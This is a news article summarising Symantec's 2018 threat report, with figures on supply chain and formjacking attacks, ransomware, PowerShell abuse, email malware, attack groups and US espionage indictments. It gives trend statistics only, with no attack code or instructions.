Supply Chain Attacks Nearly Doubled in 2018: Symantec

The number of supply chain attacks observed last year was 78% higher compared to the previous year, a new Symantec report reveals.

Aiming to compromise a target by exploiting third-party services and software, supply chain attacks take many forms, including the hijacking of software updates to inject malicious code into legitimate software. Threat actors abuse stolen credentials or compromised third-party libraries to exploit software developers in their attacks.

2018 has seen a surge in formjacking attacks, once again proving that supply chain can be a weak point for online retailers and eCommerce sites, Symantec reveals in its latest Internet Security Threat Report (ISTR). Many of these formjacking attacks steamed from compromised third-party services used by online retailers, including chatbots and customer review widgets.

Ransomware attacks went down 20% compared to 2017, but attacks against enterprises increased 12% and mobile ransomware surged 33%. Cryptojacking attacks dropped by 52% between January and December, likely influenced by a 90% drop in the value of Monero.

The use of off-the-shelf tools and operating system features to conduct attacks increased as well in 2018, with PowerShell usage showing a massive surge: the number of scripts blocked at endpoint went up 1,000% compared to the previous year.

“While we block on average 115,000 malicious PowerShell scripts each month, this only accounts for less than 1 percent of overall PowerShell usage. Effectively identifying and blocking these attacks requires the use of advanced detection methods such as analytics and machine learning,” Symantec notes.

Attackers also switched focus to smaller organizations, which were more likely to be hit with spam, phishing, and email malware last year. Spam levels continued to rise in 2018, reaching 55% of all emails, email malware remained stable, but phishing dropped from 1 in 2,995 emails to 1 in 3,207 emails.

Microsoft Office accounted for 48% of all malicious email attachments, as cyber-crime groups such as Mealybug and Necurs used not only macros in Office files, but also malicious XML files and Office files with DDE payloads. There were fewer URLs used in malicious emails (7.8%) as attackers focused on malicious attachments.

The use of zero-day exploits continued to decline last year, with only 23% of attack groups using zero-days. Some attack groups such as Gallmaker switched to relying solely on “living off the land” techniques, without using malicious code.

Large attack groups intensified their activity in 2018 and also diversified their targets. More and more groups focused on compromising operational computers to mount disruptive operations, a tactic pioneered by the Dragonfly espionage group. The method was also adopted by groups such as Thrip and Chafer last year.

According to Symantec, the increased interest in potentially disruptive attacks was also reflected in the number of groups known to use destructive malware, which went up by 25% in 2018.

The number of indictments in the United States against people alleged to be involved in state-sponsored espionage also went up last year, with 49 individuals or organizations indicted. The US charged 18 alleged Russian agents with involvement in attacks relating to the 2016 presidential election, 19 Chinese individuals or organizations, 11 Iranians, and one North Korean.

“This sudden glare of publicity may disrupt some of the organizations named in these indictments. It will severely limit the ability of indicted individuals to travel internationally, potentially hampering their ability to mount operations against targets in other countries,” Symantec notes.